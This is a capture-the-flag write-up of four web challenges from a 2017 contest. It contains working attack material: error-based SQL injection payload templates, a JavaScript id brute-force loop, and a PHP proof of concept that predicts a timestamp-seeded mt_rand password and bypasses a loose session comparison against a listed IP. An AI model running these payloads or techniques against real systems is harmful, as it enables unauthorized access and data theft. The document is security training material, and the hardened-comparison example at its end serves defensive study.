Some CTF 2017

admin, 2022-05-17 11:30:58

WEB: 抽奖呗 (Lucky Draw)

View the page source

view-source:http://xxx/

Suspicious file

http://xxx/js/jQuery.js

AAEncode and decoding it

aadecode - Decode - Online

Decoding reveals the key function getFlag()

Get Flag

Inspect the function directly in the browser console

window.getFlag

flag{951c712ac2c3e57053c43d80c0a9e543}

WEB: 继续抽 (Keep Drawing)

View the page source

view-source:http://xxx:81/

Payload

After reading the source: brute-force the id.

// Try ids 0..200: fetch a fresh token, then query get.php with the token and the
// encoded md5 of the candidate id until the response text contains "flag{".
// encode() and md5() are assumed to be helpers defined by the challenge page's own
// scripts; jQuery ($) is loaded by the page as well.
function orz(t) {
    $.get('token.php', function(token) {
        console.log(token);
        $.get("get.php?token=" + token + "&id=" + encode(md5(t)), function(jsctf3) {
            console.log(jsctf3);
            if (jsctf3['text'].indexOf('flag{') > -1) {
                alert(jsctf3['text']);   // flag found
            } else if (t < 200) {
                orz(t + 1);              // try the next id
            }
        }, 'json');
    }, 'json');
}
orz(0);

Get Flag

flag{b81cfec0285f75d4e36d2ccb2f7ec2c0}

Web just a test

A quick test shows the injection is caused by the character set, combined with error-based injection.

  • Dump tables: select table_name from information_schema.tables limit %s,1
  • Dump databases: select table_schema from information_schema.tables limit %s,1
  • Dump columns: select column_name from information_schema.columns where table_name in (0x666c4067) limit %s,1

(0x666c4067 is the hex encoding of the table name fl@g.) Payload templates, with %s as the row offset; one reads the flag from position 32 onward, the other reads the first 32 characters:

http://xxx:83/111%%df' AND extractvalue(1, concat(0x23, (select mid(f1ag,32,20) from `test`.`fl@g` limit %s,1),0x232323))-- KeTF"
http://xxx:83/111%%df' AND extractvalue(1, concat(0x23, (select mid(f1ag,1,32) from `test`.`fl@g` limit %s,1),0x232323))-- KeTF"

The ever-reliable sqlmap can actually dump it too.

Get Flag

flag{99cd1872c9b26525a8e5ec878d230caf}

WEB: Wrong

I won't comment on the challenge author's intelligence.

Get the file

Leaked file (a vim swap file): http://xxx:85/.index.php.swp

Download it, inspect it, and recover the source with vim -r xxx.php.

Hack it

The password generator uses a timestamp as the seed. Since local time and server time may differ, fetch the server time (its HTTP Date header) and convert it with strtotime() into the seed timestamp.

Run it to recover the pwd.

Then bypass the check $_SESSION['userLogin']==$_GET['login'] through the session_id (the PoC below sends an empty login= with a fresh session).

Get Flag

flag{rand_afjk_u8nm_uq2n}

PoC

Wrote this while idle; it might come in handy later.

<?php
// Reproduce the server's password: mt_rand() seeded with the server's
// timestamp (see mt_srand() below) yields the same "random" sequence.
function create_password($pw_length =  10){
    $randpwd = "";
    for ($i = 0; $i < $pw_length; $i++){
        $randpwd .= chr(mt_rand(33, 126));
    }
    return $randpwd;
}

// Parse the raw header blocks returned by CURLOPT_HEADER into arrays,
// one array per response (redirects produce several blocks).
function get_headers_from_curl_response($headerContent)
{
    $headers = array();
    $arrRequests = explode("\r\n\r\n", $headerContent);
    // The last element is the empty string after the final CRLF CRLF, so skip it.
    for ($index = 0; $index < count($arrRequests) -1; $index++) {
        foreach (explode("\r\n", $arrRequests[$index]) as $i => $line)
        {
            if ($i === 0) {
                $headers[$index]['http_code'] = $line;   // status line
            } elseif (strpos($line, ': ') !== false) {   // skip malformed lines
                // limit 2: header values (e.g. Date) may themselves contain ': '
                list ($key, $value) = explode(': ', $line, 2);
                $headers[$index][$key] = $value;
            }
        }
    }
    return $headers;
}

// GET $url. With $d true, return only the server's Date header instead of
// the body. $param is unused; kept so the call sites below stay unchanged.
function curl_get($url,$param,$d=False){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);          // include headers in the result
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt($ch, CURLOPT_VERBOSE, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $res = curl_exec($ch);
    if ($d){
        $header = get_headers_from_curl_response(substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)));
        $res = $header[0]['Date'];
    }
    curl_close($ch);
    return $res;
}

$url = "http://117.34.111.15:85/";
$seed = curl_get($url,"",True);      // server time from the Date header
mt_srand(strtotime($seed));          // seed exactly as the server does
$pwd=urlencode(create_password());
// No cookie is sent, so the session is fresh; empty login= passes the loose == check.
echo curl_get($url."index.php?pwd=$pwd&login=","");
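The two weaknesses the "Wrong" challenge turns on, each beside a hardened version, as an added example that is not part of the writeup or of the challenge's code. Function names are mine, and the session and GET arrays are passed in as constructed inputs so the file runs from the CLI.

```php
<?php
// Added example, not from the writeup. Constructed inputs; run with `php file.php`.

// Weak: seeded with a timestamp, mt_rand() replays the same "random" password
// for anyone who knows the second (the server's Date header reveals it).
function weak_password(int $seed, int $len = 10): string {
    mt_srand($seed);
    $pw = '';
    for ($i = 0; $i < $len; $i++) {
        $pw .= chr(mt_rand(33, 126));
    }
    return $pw;
}

// Hardened: random_int() draws from the OS CSPRNG; there is no seed to recover.
function strong_password(int $len = 10): string {
    $pw = '';
    for ($i = 0; $i < $len; $i++) {
        $pw .= chr(random_int(33, 126));
    }
    return $pw;
}

// Weak: loose comparison. On a fresh session $_SESSION['userLogin'] is unset
// (null), and null == '' is true in PHP, so a request with an empty login= passes.
function weak_login_check(array $session, array $get): bool {
    return ($session['userLogin'] ?? null) == ($get['login'] ?? null);
}

// Hardened: both values must be present, and the comparison is strict and
// constant-time.
function strict_login_check(array $session, array $get): bool {
    if (!isset($session['userLogin'], $get['login'])) {
        return false;
    }
    return hash_equals((string) $session['userLogin'], (string) $get['login']);
}

// Demonstration with constructed inputs: an empty session and login=''.
$seed = time();
var_dump(weak_password($seed) === weak_password($seed));   // same seed, same password
var_dump(strong_password() === strong_password());          // independent draws
var_dump(weak_login_check([], ['login' => '']));            // the bypass
var_dump(strict_login_check([], ['login' => '']));          // rejected
```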

End


FROM : virzz.com | Author:Virink

Reposted at CN-SEC: https://cn-sec.com/archives/1012975.html
